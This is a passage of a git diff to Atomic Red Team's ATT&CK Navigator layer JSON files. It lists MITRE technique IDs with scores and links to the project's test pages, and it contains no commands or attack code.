Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1491","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1546.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1550","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1558","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1569","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index cd0528ba..03281866 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-re